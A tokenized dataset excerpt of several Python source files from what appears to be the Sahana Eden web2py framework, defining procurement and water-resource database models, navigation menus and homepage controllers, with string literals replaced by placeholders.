<s> """<STR_LIT>""" <EOL> __all__ = ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) <EOL> from gluon import * <EOL> from gluon . storage import Storage <EOL> from . . s3 import * <EOL> class S3ProcurementModel ( S3Model ) : <EOL> """<STR_LIT>""" <EOL> names = ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) <EOL> def model ( self ) : <EOL> T = current . T <EOL> db = current . db <EOL> auth = current . auth <EOL> crud_strings = current . response . s3 . crud_strings <EOL> define_table = self . define_table <EOL> messages = current . messages <EOL> configure = self . configure <EOL> proc_shipping_opts = { <NUM_LIT:0> : messages [ "<STR_LIT>" ] , <EOL> <NUM_LIT:1> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:2> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:3> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:4> : T ( "<STR_LIT>" ) <EOL> } <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> self . super_link ( "<STR_LIT>" , "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> default = auth . user . site_id if auth . is_logged_in ( ) else None , <EOL> readable = True , <EOL> writable = True , <EOL> empty = False , <EOL> represent = self . org_site_represent ) , <EOL> s3_date ( "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) <EOL> ) , <EOL> s3_date ( "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> self . org_organisation_id ( label = T ( "<STR_LIT>" ) ) , <EOL> Field ( "<STR_LIT>" , "<STR_LIT>" , <EOL> requires = IS_EMPTY_OR ( IS_IN_SET ( proc_shipping_opts ) ) , <EOL> represent = lambda opt : proc_shipping_opts . get ( opt , <EOL> messages . 
UNKNOWN_OPT ) , <EOL> label = T ( "<STR_LIT>" ) , <EOL> default = <NUM_LIT:0> , <EOL> ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = T ( "<STR_LIT>" ) , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> label_delete_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> plan_item_url = URL ( f = "<STR_LIT>" , args = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> configure ( tablename , <EOL> create_next = plan_item_url , <EOL> update_next = plan_item_url ) <EOL> plan_id = S3ReusableField ( "<STR_LIT>" , "<STR_LIT>" % tablename , <EOL> sortby = "<STR_LIT:date>" , <EOL> requires = IS_EMPTY_OR ( <EOL> IS_ONE_OF ( db , "<STR_LIT>" , <EOL> self . proc_plan_represent , <EOL> orderby = "<STR_LIT>" , <EOL> sort = True ) ) , <EOL> represent = self . proc_plan_represent , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ondelete = "<STR_LIT>" ) <EOL> self . add_components ( tablename , <EOL> proc_plan_item = "<STR_LIT>" , <EOL> ) <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> plan_id ( ) , <EOL> self . supply_item_entity_id , <EOL> self . supply_item_id ( ) , <EOL> self . 
supply_item_pack_id ( ) , <EOL> Field ( "<STR_LIT>" , "<STR_LIT>" , notnull = True , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> s3_currency ( readable = False , <EOL> writable = False <EOL> ) , <EOL> Field ( "<STR_LIT>" , "<STR_LIT>" , <EOL> readable = False , <EOL> writable = False , <EOL> label = T ( "<STR_LIT>" ) ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = T ( "<STR_LIT>" ) , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> label_delete_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> filter_widgets = [ <EOL> S3TextFilter ( [ "<STR_LIT>" , <EOL> ] , <EOL> label = T ( "<STR_LIT>" ) , <EOL> comment = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> S3OptionsFilter ( "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> comment = T ( "<STR_LIT>" ) , <EOL> cols = <NUM_LIT:2> , <EOL> hidden = True , <EOL> ) , <EOL> ] <EOL> configure ( tablename , <EOL> super_entity = "<STR_LIT>" , <EOL> filter_widgets = filter_widgets , <EOL> report_hide_comments = True ) <EOL> return { } <EOL> @ staticmethod <EOL> def proc_plan_represent ( id , row = None ) : <EOL> """<STR_LIT>""" <EOL> if row : <EOL> table = current . db . proc_plan <EOL> elif not id : <EOL> return current . messages [ "<STR_LIT>" ] <EOL> else : <EOL> db = current . db <EOL> table = db . proc_plan <EOL> row = db ( table . id == id ) . select ( table . site_id , <EOL> table . order_date , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> try : <EOL> return "<STR_LIT>" % ( table . site_id . represent ( row . site_id ) , <EOL> table . order_date . represent ( row . order_date ) ) <EOL> except : <EOL> return current . messages . 
UNKNOWN_OPT <EOL> def proc_rheader ( r ) : <EOL> """<STR_LIT>""" <EOL> if r . representation == "<STR_LIT:html>" : <EOL> plan = r . record <EOL> if plan : <EOL> T = current . T <EOL> tabs = [ <EOL> ( T ( "<STR_LIT>" ) , None ) , <EOL> ( T ( "<STR_LIT>" ) , "<STR_LIT>" ) , <EOL> ] <EOL> rheader_tabs = s3_rheader_tabs ( r , tabs ) <EOL> table = r . table <EOL> rheader = DIV ( TABLE ( TR ( TH ( "<STR_LIT>" % table . site_id . label ) , <EOL> table . site_id . represent ( plan . site_id ) , <EOL> ) , <EOL> TR ( TH ( "<STR_LIT>" % table . order_date . label ) , <EOL> table . order_date . represent ( plan . order_date ) , <EOL> ) , <EOL> TR ( TH ( "<STR_LIT>" % table . eta . label ) , <EOL> table . eta . represent ( plan . eta ) , <EOL> ) , <EOL> TR ( TH ( "<STR_LIT>" % table . shipping . label ) , <EOL> table . shipping . represent ( plan . shipping ) , <EOL> ) , <EOL> ) , <EOL> rheader_tabs <EOL> ) <EOL> return rheader <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> __all__ = ( "<STR_LIT>" , ) <EOL> from gluon import * <EOL> from gluon . storage import Storage <EOL> from . . s3 import * <EOL> from s3layouts import S3PopupLink <EOL> class S3WaterModel ( S3Model ) : <EOL> """<STR_LIT>""" <EOL> names = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> def model ( self ) : <EOL> T = current . T <EOL> db = current . db <EOL> crud_strings = current . response . s3 . crud_strings <EOL> define_table = self . define_table <EOL> location_id = self . gis_location_id <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> Field ( "<STR_LIT:name>" , <EOL> label = T ( "<STR_LIT:Name>" ) , <EOL> ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> ADD_ZONE_TYPE = T ( "<STR_LIT>" ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = ADD_ZONE_TYPE , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> title_upload = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> label_delete_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> zone_type_represent = S3Represent ( lookup = tablename ) <EOL> self . configure ( tablename , <EOL> deduplicate = S3Duplicate ( ) , <EOL> ) <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> Field ( "<STR_LIT:name>" , <EOL> label = T ( "<STR_LIT:Name>" ) , <EOL> ) , <EOL> Field ( "<STR_LIT>" , db . 
water_zone_type , <EOL> label = T ( "<STR_LIT>" ) , <EOL> represent = zone_type_represent , <EOL> requires = IS_EMPTY_OR ( <EOL> IS_ONE_OF ( db , "<STR_LIT>" , <EOL> zone_type_represent , <EOL> sort = True ) ) , <EOL> comment = S3PopupLink ( c = "<STR_LIT>" , <EOL> f = "<STR_LIT>" , <EOL> label = ADD_ZONE_TYPE , <EOL> tooltip = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> ) , <EOL> location_id ( <EOL> widget = S3LocationSelector ( catalog_layers = True , <EOL> points = False , <EOL> polygons = True , <EOL> ) , <EOL> ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = T ( "<STR_LIT>" ) , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> title_upload = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> label_delete_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> zone_represent = S3Represent ( lookup = tablename ) <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> Field ( "<STR_LIT:name>" , <EOL> label = T ( "<STR_LIT:Name>" ) , <EOL> requires = IS_NOT_EMPTY ( ) , <EOL> ) , <EOL> location_id ( <EOL> widget = S3LocationSelector ( catalog_layers = True , <EOL> points = False , <EOL> polygons = True , <EOL> ) <EOL> ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> ADD_RIVER = T ( "<STR_LIT>" ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = ADD_RIVER , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) 
) <EOL> flowstatus_opts = { <NUM_LIT:1> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:2> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:3> : T ( "<STR_LIT>" ) , <EOL> <NUM_LIT:4> : T ( "<STR_LIT>" ) <EOL> } <EOL> tablename = "<STR_LIT>" <EOL> define_table ( tablename , <EOL> Field ( "<STR_LIT:name>" , <EOL> label = T ( "<STR_LIT:Name>" ) , <EOL> ) , <EOL> Field ( "<STR_LIT:code>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> location_id ( ) , <EOL> Field ( "<STR_LIT:url>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> represent = lambda url : A ( url , _href = url , _target = "<STR_LIT:blank>" ) , <EOL> requires = IS_EMPTY_OR ( IS_URL ( ) ) , <EOL> ) , <EOL> Field ( "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> Field ( "<STR_LIT>" , "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> ) , <EOL> Field ( "<STR_LIT:status>" , "<STR_LIT>" , <EOL> label = T ( "<STR_LIT>" ) , <EOL> represent = lambda opt : flowstatus_opts . get ( opt , opt ) , <EOL> requires = IS_EMPTY_OR ( IS_IN_SET ( flowstatus_opts ) ) , <EOL> ) , <EOL> s3_comments ( ) , <EOL> * s3_meta_fields ( ) ) <EOL> crud_strings [ tablename ] = Storage ( <EOL> label_create = T ( "<STR_LIT>" ) , <EOL> title_display = T ( "<STR_LIT>" ) , <EOL> title_list = T ( "<STR_LIT>" ) , <EOL> title_update = T ( "<STR_LIT>" ) , <EOL> title_map = T ( "<STR_LIT>" ) , <EOL> label_list_button = T ( "<STR_LIT>" ) , <EOL> msg_record_created = T ( "<STR_LIT>" ) , <EOL> msg_record_modified = T ( "<STR_LIT>" ) , <EOL> msg_record_deleted = T ( "<STR_LIT>" ) , <EOL> msg_list_empty = T ( "<STR_LIT>" ) ) <EOL> return { } </s>
<s> from gluon import current <EOL> from s3 import * <EOL> from s3layouts import * <EOL> try : <EOL> from . layouts import * <EOL> except ImportError : <EOL> pass <EOL> import s3menus as default <EOL> class S3OptionsMenu ( default . S3OptionsMenu ) : <EOL> """<STR_LIT>""" <EOL> def vol ( self ) : <EOL> """<STR_LIT>""" <EOL> s3 = current . session . s3 <EOL> ADMIN = s3 . system_roles . ADMIN <EOL> manager_mode = lambda i : s3 . hrm . mode is None <EOL> personal_mode = lambda i : s3 . hrm . mode is not None <EOL> is_org_admin = lambda i : s3 . hrm . orgs and True or ADMIN in s3 . roles <EOL> settings = current . deployment_settings <EOL> teams = settings . get_hrm_teams ( ) <EOL> use_teams = lambda i : teams <EOL> return M ( c = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = { "<STR_LIT>" : "<STR_LIT>" } , p = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( teams , f = "<STR_LIT>" , <EOL> check = [ manager_mode , use_teams ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:index>" , <EOL> check = [ personal_mode , is_org_admin ] ) , <EOL> ) </s>
<s> from gluon import * <EOL> from s3 import S3CustomController <EOL> TEMPLATE = "<STR_LIT>" <EOL> class index ( S3CustomController ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self ) : <EOL> output = { } <EOL> T = current . T <EOL> s3 = current . response . s3 <EOL> auth = current . auth <EOL> settings = current . deployment_settings <EOL> roles = current . session . s3 . roles <EOL> system_roles = auth . get_system_roles ( ) <EOL> if settings . has_module ( "<STR_LIT>" ) : <EOL> ADMIN = system_roles . ADMIN in roles <EOL> s3db = current . s3db <EOL> table = s3db . cms_post <EOL> ltable = s3db . cms_post_module <EOL> module = "<STR_LIT:default>" <EOL> resource = "<STR_LIT:index>" <EOL> query = ( ltable . module == module ) & ( ( ltable . resource == None ) | ( ltable . resource == resource ) ) & ( ltable . post_id == table . id ) & ( table . deleted != True ) <EOL> item = current . db ( query ) . select ( table . id , <EOL> table . body , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> if item : <EOL> if ADMIN : <EOL> item = DIV ( XML ( item . body ) , <EOL> BR ( ) , <EOL> A ( current . T ( "<STR_LIT>" ) , <EOL> _href = URL ( c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> args = [ item . id , "<STR_LIT>" ] ) , <EOL> _class = "<STR_LIT>" ) ) <EOL> else : <EOL> item = DIV ( XML ( item . body ) ) <EOL> elif ADMIN : <EOL> if s3 . crud . formstyle == "<STR_LIT>" : <EOL> _class = "<STR_LIT>" <EOL> else : <EOL> _class = "<STR_LIT>" <EOL> item = A ( T ( "<STR_LIT>" ) , <EOL> _href = URL ( c = "<STR_LIT>" , f = "<STR_LIT>" , args = "<STR_LIT>" , <EOL> vars = { "<STR_LIT>" : module , <EOL> "<STR_LIT>" : resource <EOL> } ) , <EOL> _class = "<STR_LIT>" % _class ) <EOL> else : <EOL> item = "<STR_LIT>" <EOL> else : <EOL> item = "<STR_LIT>" <EOL> output [ "<STR_LIT>" ] = item <EOL> self_registration = settings . 
get_security_registration_visible ( ) <EOL> registered = False <EOL> login_form = None <EOL> login_div = None <EOL> register_form = None <EOL> register_div = None <EOL> if system_roles . AUTHENTICATED not in roles : <EOL> login_buttons = DIV ( A ( T ( "<STR_LIT>" ) , <EOL> _id = "<STR_LIT>" , <EOL> _class = "<STR_LIT>" ) , <EOL> _id = "<STR_LIT>" <EOL> ) <EOL> script = '''<STR_LIT>''' <EOL> s3 . jquery_ready . append ( script ) <EOL> if current . request . cookies . has_key ( "<STR_LIT>" ) : <EOL> registered = True <EOL> if self_registration is True : <EOL> login_buttons . append ( A ( T ( "<STR_LIT>" ) , <EOL> _id = "<STR_LIT>" , <EOL> _class = "<STR_LIT>" , <EOL> _style = "<STR_LIT>" ) ) <EOL> script = '''<STR_LIT>''' <EOL> s3 . jquery_ready . append ( script ) <EOL> register_form = auth . register ( ) <EOL> register_div = DIV ( H3 ( T ( "<STR_LIT>" ) ) , <EOL> P ( XML ( T ( "<STR_LIT>" ) % dict ( sign_up_now = B ( T ( "<STR_LIT>" ) ) ) ) ) ) <EOL> register_script = '''<STR_LIT>''' <EOL> s3 . jquery_ready . append ( register_script ) <EOL> auth . messages . submit_button = T ( "<STR_LIT>" ) <EOL> login_form = auth . login ( inline = True ) <EOL> login_div = DIV ( H3 ( T ( "<STR_LIT>" ) ) , <EOL> P ( XML ( T ( "<STR_LIT>" ) % dict ( login = B ( T ( "<STR_LIT>" ) ) ) ) ) ) <EOL> else : <EOL> login_buttons = "<STR_LIT>" <EOL> output [ "<STR_LIT>" ] = login_buttons <EOL> output [ "<STR_LIT>" ] = self_registration <EOL> output [ "<STR_LIT>" ] = registered <EOL> output [ "<STR_LIT>" ] = login_div <EOL> output [ "<STR_LIT>" ] = login_form <EOL> output [ "<STR_LIT>" ] = register_div <EOL> output [ "<STR_LIT>" ] = register_form <EOL> self . _view ( TEMPLATE , "<STR_LIT>" ) <EOL> return output </s>
<s> from gluon import * <EOL> from s3 import S3CustomController <EOL> THEME = "<STR_LIT>" <EOL> class index ( S3CustomController ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self ) : <EOL> response = current . response <EOL> output = { } <EOL> s3 = response . s3 <EOL> s3 . stylesheets . append ( "<STR_LIT>" ) <EOL> self . _view ( THEME , "<STR_LIT>" ) <EOL> return output <EOL> def latest_records ( resource , layout , list_id , limit , list_fields , orderby ) : <EOL> """<STR_LIT>""" <EOL> datalist , numrows , ids = resource . datalist ( fields = list_fields , <EOL> start = None , <EOL> limit = limit , <EOL> list_id = list_id , <EOL> orderby = orderby , <EOL> layout = layout ) <EOL> if numrows == <NUM_LIT:0> : <EOL> from s3 . s3crud import S3CRUD <EOL> table = resource . table <EOL> if "<STR_LIT>" in table : <EOL> available_records = current . db ( table . deleted != True ) <EOL> else : <EOL> available_records = current . db ( table . _id > <NUM_LIT:0> ) <EOL> if available_records . select ( table . _id , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) : <EOL> msg = DIV ( S3CRUD . crud_string ( resource . tablename , <EOL> "<STR_LIT>" ) , <EOL> _class = "<STR_LIT>" ) <EOL> else : <EOL> msg = DIV ( S3CRUD . crud_string ( resource . tablename , <EOL> "<STR_LIT>" ) , <EOL> _class = "<STR_LIT>" ) <EOL> data = msg <EOL> else : <EOL> dl = datalist . html ( ) <EOL> data = dl <EOL> return data </s>
<s> from os import path <EOL> from gluon import * <EOL> from s3 import S3CustomController <EOL> THEME = "<STR_LIT>" <EOL> class index ( S3CustomController ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self ) : <EOL> output = { } <EOL> if current . deployment_settings . has_module ( "<STR_LIT>" ) : <EOL> system_roles = current . auth . get_system_roles ( ) <EOL> ADMIN = system_roles . ADMIN in current . session . s3 . roles <EOL> s3db = current . s3db <EOL> table = s3db . cms_post <EOL> ltable = s3db . cms_post_module <EOL> module = "<STR_LIT:default>" <EOL> resource = "<STR_LIT:index>" <EOL> query = ( ltable . module == module ) & ( ( ltable . resource == None ) | ( ltable . resource == resource ) ) & ( ltable . post_id == table . id ) & ( table . deleted != True ) <EOL> item = current . db ( query ) . select ( table . body , <EOL> table . id , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> if item : <EOL> if ADMIN : <EOL> item = DIV ( XML ( item . body ) , <EOL> BR ( ) , <EOL> A ( current . T ( "<STR_LIT>" ) , <EOL> _href = URL ( c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> args = [ item . id , "<STR_LIT>" ] ) , <EOL> _class = "<STR_LIT>" ) ) <EOL> else : <EOL> item = DIV ( XML ( item . body ) ) <EOL> elif ADMIN : <EOL> if current . response . s3 . crud . formstyle == "<STR_LIT>" : <EOL> _class = "<STR_LIT>" <EOL> else : <EOL> _class = "<STR_LIT>" <EOL> item = A ( current . T ( "<STR_LIT>" ) , <EOL> _href = URL ( c = "<STR_LIT>" , f = "<STR_LIT>" , args = "<STR_LIT>" , <EOL> vars = { "<STR_LIT>" : module , <EOL> "<STR_LIT>" : resource <EOL> } ) , <EOL> _class = "<STR_LIT>" % _class ) <EOL> else : <EOL> item = "<STR_LIT>" <EOL> else : <EOL> item = "<STR_LIT>" <EOL> output [ "<STR_LIT>" ] = item <EOL> self . _view ( THEME , "<STR_LIT>" ) <EOL> return output <EOL> def deploy_index ( ) : <EOL> """<STR_LIT>""" <EOL> response = current . 
response <EOL> def prep ( r ) : <EOL> default_url = URL ( f = "<STR_LIT>" , args = "<STR_LIT>" , vars = { } ) <EOL> return current . s3db . cms_documentation ( r , "<STR_LIT>" , default_url ) <EOL> response . s3 . prep = prep <EOL> output = current . rest_controller ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> view = path . join ( current . request . folder , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> THEME , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> try : <EOL> response . view = open ( view , "<STR_LIT:rb>" ) <EOL> except IOError : <EOL> from gluon . http import HTTP <EOL> raise HTTP ( <NUM_LIT> , "<STR_LIT>" % view ) <EOL> return output </s>
<s> from gluon import current <EOL> from s3 import * <EOL> from s3layouts import * <EOL> try : <EOL> from . layouts import * <EOL> except ImportError : <EOL> pass <EOL> import s3menus as default <EOL> class S3MainMenu ( default . S3MainMenu ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def menu ( cls ) : <EOL> """<STR_LIT>""" <EOL> main_menu = MM ( ) ( <EOL> cls . menu_modules ( ) , <EOL> ) <EOL> current . menu . personal = cls . menu_personal ( ) <EOL> current . menu . lang = cls . menu_lang ( ) <EOL> current . menu . about = cls . menu_about ( ) <EOL> current . menu . org = cls . menu_org ( ) <EOL> return main_menu <EOL> @ classmethod <EOL> def menu_modules ( cls ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> homepage ( "<STR_LIT>" ) ( <EOL> ) , <EOL> homepage ( "<STR_LIT>" , name = "<STR_LIT>" ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) , <EOL> homepage ( "<STR_LIT>" ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> homepage ( "<STR_LIT>" ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> homepage ( "<STR_LIT>" ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> homepage ( "<STR_LIT>" ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) , <EOL> homepage ( "<STR_LIT>" , name = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = { "<STR_LIT>" : "<STR_LIT:2>" } ) ( <EOL> MM ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> MM ( 
"<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> ] <EOL> @ classmethod <EOL> def menu_org ( cls ) : <EOL> """<STR_LIT>""" <EOL> OM = S3OrgMenuLayout <EOL> return OM ( ) <EOL> @ classmethod <EOL> def menu_lang ( cls ) : <EOL> s3 = current . response . s3 <EOL> menu_lang = ML ( "<STR_LIT>" , right = True ) <EOL> for language in s3 . l10n_languages . items ( ) : <EOL> code , name = language <EOL> menu_lang ( <EOL> ML ( name , translate = False , lang_code = code , lang_name = name ) <EOL> ) <EOL> return menu_lang <EOL> @ classmethod <EOL> def menu_personal ( cls ) : <EOL> """<STR_LIT>""" <EOL> auth = current . auth <EOL> s3 = current . response . s3 <EOL> settings = current . deployment_settings <EOL> if not auth . is_logged_in ( ) : <EOL> request = current . request <EOL> login_next = URL ( args = request . args , vars = request . vars ) <EOL> if request . controller == "<STR_LIT:default>" and request . function == "<STR_LIT:user>" and "<STR_LIT>" in request . get_vars : <EOL> login_next = request . get_vars [ "<STR_LIT>" ] <EOL> self_registration = settings . get_security_self_registration ( ) <EOL> menu_personal = MP ( ) ( <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT:user>" , <EOL> m = "<STR_LIT>" , check = self_registration ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT:user>" , <EOL> m = "<STR_LIT>" , vars = dict ( _next = login_next ) ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT:user>" , <EOL> m = "<STR_LIT>" ) , <EOL> ) <EOL> else : <EOL> s3_has_role = auth . 
s3_has_role <EOL> is_org_admin = lambda i : s3_has_role ( "<STR_LIT>" ) and not s3_has_role ( "<STR_LIT>" ) <EOL> menu_personal = MP ( ) ( <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT:index>" , <EOL> check = s3_has_role ( "<STR_LIT>" ) ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT:user>" , <EOL> check = is_org_admin ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT>" ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT:user>" , <EOL> m = "<STR_LIT>" ) , <EOL> MP ( "<STR_LIT>" , c = "<STR_LIT:default>" , f = "<STR_LIT:user>" , <EOL> m = "<STR_LIT>" ) , <EOL> ) <EOL> return menu_personal <EOL> @ classmethod <EOL> def menu_about ( cls ) : <EOL> menu_about = MA ( c = "<STR_LIT:default>" ) ( <EOL> MA ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MA ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MA ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> MA ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) <EOL> return menu_about <EOL> class S3OptionsMenu ( default . S3OptionsMenu ) : <EOL> """<STR_LIT>""" <EOL> def admin ( self ) : <EOL> """<STR_LIT>""" <EOL> menu = super ( S3OptionsMenu , self ) . admin ( ) <EOL> menu ( M ( "<STR_LIT>" , c = "<STR_LIT>" , f = 